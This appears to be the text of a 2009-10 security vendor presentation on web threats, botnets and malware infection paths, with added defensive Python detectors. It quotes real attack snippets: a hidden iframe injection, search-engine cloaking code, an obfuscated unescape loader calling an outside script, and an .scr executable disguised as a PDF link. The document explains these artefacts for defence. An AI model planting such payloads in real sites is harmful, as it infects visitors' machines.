The Anatomy of a Web Attack

Dennis Pike

Systems Engineer

Geo Specialists Lead – Americas Security

dennis.pike@bluecoat.com

Agenda
  • State of the Web
    • Top categories
    • Top attacks
  • The Anatomy of a Web Attack
    • Lures to web threats
    • Examples
  • Dynamic Link Analysis
Best of the Worst
  • Top Web Category?

>> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity

  • Top Web threat?

>> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer.

>> New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. *

>> Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. *

*Google Inc.

Email vs Social Networking
  • Do more people use email or social networking sites?

>> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.

Noteworthy Items

Argument for Video (HTTP and Streaming)

Changing Web Habits
  • Top 10 Categories – 2009
  • WebFilter/WebPulse, 62M+ Users
  • 1. Social Networking
  • 2. Web Advertisements
  • 3. Search Engines/Portals
  • 4. Personals/Dating
  • 5. Pornography
  • 6. Computers/Internet
  • 7. Audio/Video Clips
  • 8. Adult/Mature Content
  • 9. Web Email
  • 10. Illegal/Questionable

  • Social Networking
    • Moved to #1 from #2 position
    • Represents 25% of Top10 requests
  • Web Email
    • Dropped to #9 from #5 position
    • Users migrating to social networking
  • Cyber Crime Leverages
    • Search engine poisoning
    • Fake AV and Codec updates
    • Popular site injections
    • Death, Drama & Disaster lures
    • Health & Wealth scams

Web Threats Rising Exponentially
  • 2/3 of all known malicious code threats in 1 year (Symantec April’09)
  • 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)
Distribution Power
  • Botnet computing power to:
    • Pitch worthless products
    • Hijack online banking accounts
    • Steal corporate data

Top 5 Botnets in 2009

  • Botnet: Koobface B, Koobface D, Zeus, Monkif A, Clickbot
  • Peak number of active bots: 1,070,000; 812,000; 599,000; 506,000; 375,000
  • How it spreads: Search Results, Facebook, Twitter, Social Networking

USA TODAY Research – March 2010

An Invitation to Crime

1 – An automated program logs on to social network using stolen user credentials.

2 – Program messages user’s friends asking them to click on a link to a photo or video.

3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot.

4 – The bot steals the PC owner’s logon credentials, starting the cycle again.

USA TODAY Research – March 2010

Web Evolution

  • Static Pages → Dynamic Pages
  • Dynamic Pages → Interactive Pages
  • Publishing Model → Community Model
  • Single Host Pages → Multi-Host Pages
  • Nice to Have → Must Have

Paths to Malware Infection

  • Link Farms
  • Infected Site
  • Search Engine
  • Blogs, Forums
  • Relay
  • Bait
  • Malware

End User…Infected Site

www.inka.com

<html>
<iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe>
<div id="header">
</html>

homenameregistration.cn/in.cgi?income12
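
A defender-side check for the injection shown on this slide, as an added example that is not part of the original presentation: it parses a page and reports iframes that are both invisible (1x1 or smaller, or hidden by style) and loaded from a host other than the page's own. The function names and the second, benign iframe in the sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDING_STYLES = ("visibility:hidden", "display:none")


def _tiny(value):
    """True for width/height values of 0 or 1 pixel (e.g. '1', '1px')."""
    digits = (value or "").strip().lower().replace("px", "")
    return digits.isdigit() and int(digits) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are invisible to the user and load from another host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src_host = (urlparse(a.get("src", "")).hostname or "").lower()
        style = a.get("style", "").replace(" ", "").lower()
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1 or smaller")
        reasons += [s for s in HIDING_STYLES if s in style]
        # Relative or same-host frames are skipped; only off-site hidden frames count.
        if reasons and src_host and src_host != self.page_host:
            self.findings.append((src_host, reasons))


def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings


# Constructed sample: the slide's injected iframe plus a benign visible embed.
SAMPLE = """<html>
<iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe>
<div id="header"></div>
<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>
</html>"""

if __name__ == "__main__":
    for host, reasons in find_hidden_iframes(SAMPLE, "www.inka.com"):
        print(host, reasons)
```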

Web 2.0 and Search Engines

[Diagram: Forums, Blogs, Wikis, Guestbooks; WWW; Search Engine View]

Web 2.0 and Search Engines

[Diagram: WWW; Search Engine View of pages as "Links…" and "Words…"]

Hijacked Website

if ("search engine") {
    echo "…indexable content…"
} else {
    echo '<body><script src="live.js"></script>'
}

xdesignstudios.com
dir1
index.php
  • id=fall+printable+coloring+pages
  • id=free+printable+easter+drawings
  • id=disney+printable+cartoon+characters
  • id=free+printable+halloween+sheets
  • id=girls+free+printable+organizer
  • id=in+store+printable+catherines+coupons
live.js

End User…Search Engine Redirect

index.php?id=hannah-montana-printable-birthday-invitations

<body>
<script src="live.js"></script>

live.js

document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…

http://cracksinside.com/red/gen.js
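
For analysts triaging a file like live.js, the following added example (not from the original presentation) decodes `document.write(unescape('…'))` wrappers statically, without running the script, and lists the script URLs that only become visible after decoding. The slide's payload is truncated, so the sample is constructed: it begins with the same encoded bytes as the slide but points at a placeholder URL, and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# document.write(unescape('...')) carrying a percent-encoded string literal
WRAPPER = re.compile(
    r"""document\.write\(\s*unescape\(\s*(['"])((?:%[0-9A-Fa-f]{2}|[^'"%])*)\1"""
)
SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def decode_unescape_writes(js_text):
    """Return the decoded markup of every document.write(unescape('...')) call."""
    # JavaScript's unescape() maps %XX to Latin-1 code points, so decode the same way.
    return [unquote(m.group(2), encoding="latin-1") for m in WRAPPER.finditer(js_text)]


def hidden_script_sources(js_text, max_depth=3):
    """Peel nested layers and collect script URLs that appear only after decoding."""
    found, layer = [], js_text
    for _ in range(max_depth):
        decoded = decode_unescape_writes(layer)
        if not decoded:
            break
        layer = "\n".join(decoded)
        found += SCRIPT_SRC.findall(layer)
    return found


def _encode(markup):
    """Percent-encode every byte, matching the encoding style of the slide's payload."""
    return "".join("%%%02X" % b for b in markup.encode("latin-1"))


# Constructed sample standing in for live.js; the URL is a placeholder.
INNER = '<SCRIPT    language="javascript" src="http://redirector.example/red/gen.js"></SCRIPT>'
SAMPLE_LIVE_JS = "document.write(unescape('" + _encode(INNER) + "'));"

if __name__ == "__main__":
    print(hidden_script_sources(SAMPLE_LIVE_JS))
```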

What just happened?

[Diagram: WWW; Search Engine View of pages as "Links…" and "Words…"; Redirect]

Recent Examples - VBMania

www.sharedocuments.com/library/PDF_Document21.025542010.pdf

Email text

www.sharedocuments.com/library/PDF_Document21.025542010.pdf

members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
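
A mail-filter style check for the pattern on this slide, as an added example that is not part of the original presentation: it compares the URL a message displays with the link's real target and flags a document-looking file name that ends in an executable extension. The extension lists, function names and the benign second link are assumptions chosen for illustration.

```python
from pathlib import PurePosixPath
from urllib.parse import urlparse

EXECUTABLE_EXTS = {".scr", ".exe", ".pif", ".com", ".bat", ".cmd", ".vbs"}
DOCUMENT_HINTS = ("pdf", "doc", "xls", "jpg", "zip")


def _parts(url):
    """Split a URL (scheme optional) into lower-cased host and path."""
    try:
        parsed = urlparse(url if "://" in url else "http://" + url)
        return (parsed.hostname or "").lower(), PurePosixPath(parsed.path)
    except ValueError:  # link text that is not URL-like at all
        return "", PurePosixPath("")


def assess_link(shown, href):
    """Compare what the message displays with where the link really goes."""
    shown_host, _ = _parts(shown.strip())
    real_host, real_path = _parts(href.strip())
    flags = []
    # Only compare hosts when the visible text itself looks like a URL.
    if "." in shown_host and " " not in shown_host and shown_host != real_host:
        flags.append("displayed host differs from target host")
    if real_path.suffix.lower() in EXECUTABLE_EXTS:
        flags.append("target is an executable file type")
        stem = real_path.stem.lower()
        if any(stem.endswith(sep + hint) for hint in DOCUMENT_HINTS for sep in "._-"):
            flags.append("document-looking name with executable extension")
    return flags


def audit(links):
    """Return only the (shown, href, flags) entries that raised a flag."""
    return [(s, h, f) for s, h in links if (f := assess_link(s, h))]


# Constructed sample: the first pair uses the two URLs from the slide, the second is benign.
SAMPLE_LINKS = [
    ("www.sharedocuments.com/library/PDF_Document21.025542010.pdf",
     "http://members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr"),
    ("Travel policy", "http://intranet.example/policy.pdf"),
]

if __name__ == "__main__":
    for shown, href, flags in audit(SAMPLE_LINKS):
        print(href, flags)
```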